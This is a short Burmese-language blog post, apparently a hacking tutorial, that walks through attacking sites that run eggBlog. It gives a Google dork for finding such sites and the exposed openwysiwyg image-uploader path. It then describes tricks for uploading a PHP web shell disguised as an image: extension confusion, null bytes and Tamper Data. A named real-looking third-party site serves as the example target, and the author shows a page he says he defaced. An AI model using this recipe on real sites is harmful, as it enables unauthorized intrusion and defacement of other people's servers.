' Website Hacking ပုိင္းေတာင္ မေရးျဖစ္တာၾကာပါျပီ....
ကြ်န္ေတာ္ တုိ ့အမ်ဳိးတည္းနာေရး ျဖစ္သြားလုိ ့ဗ်ာ.. ဘာမွကိုလုပ္ခ်င္ကိုင္ခ်င္စိတ္မရွိေတာ့ေလာက္ေအာင္ပါဘဲဗ်ာ...
စိတ္လည္းေတာ္ေတာ္ေလသြားတယ္.. ကဲဒါေတြထားပါ.. ခုနည္းေလး စလုိက္ရေအာင္ဗ်ာ..
Google Dork : "powered by eggBlog.net"
မိမိၾကိုက္တဲ့ဆုိဒ္လင့္ တစ္ခုကို ရယူလုိက္ပါ..
[+] Exploit Link
http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
[+] Uploaded File Link
http://server/[path]/photos/uploads/shell.php.jpg
[+] ဥပမာ ေအာက္ကလင့္ဘဲ ဆုိပါေတာ့ဗ်ာ..
http://www.websitesbyblake.com
[+]အဲ့ဆုိဒ္ကို ေအာက္ကလုိမ်ဳိးေလး အစားထုိးလုိက္ပါ...
http://www.websitesbyblake.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
[+]ဒါဆုိရင္ Image uploader ၾကီးထြက္လာပါမယ္...
သင့္ရွဲကုိ .php;.jpg .php%00%.jp စတာေလးတြ ေပ့ါ ေနာက္က null ေလးေတြကုိ မိမိ အေတြ ့အၾကဳံေလးနဲ ့အလုိက္သင့္သလုိ တင္သြားရပါမယ္.. Tempar data နဲ ့လည္း တစ္ခ်ဳိ ့ဆုိဒ္ေတြ
တင္လုိ ့ရပါတယ္..
ဖုိင္တင္ပီးရင္ေတာ့ ေအာက္ကလင့္မွျပန္ၾကည့္ရမွာျဖစ္ပါတယ္...
[+]ၾကည့္ရင္လင့္..
www.someone.com/photos/uploads/[file]
ေပ့ါ ဥပမာ အေနနဲ ့ေအာက္ကလင့္ေလးကိုၾကည့္ပါ...
[+] ပာိုးအရင္တုန္းက ကြ်န္ေတာ့ ပထမဆုံးဆုိဒ္ logo ေလးပါ...
http://www.websitesbyblake.com/photos/uploads/forsite.jpg
ေပ်ာ္ရႊင္ပါေစဗ်ာ..





0 comments:
Post a Comment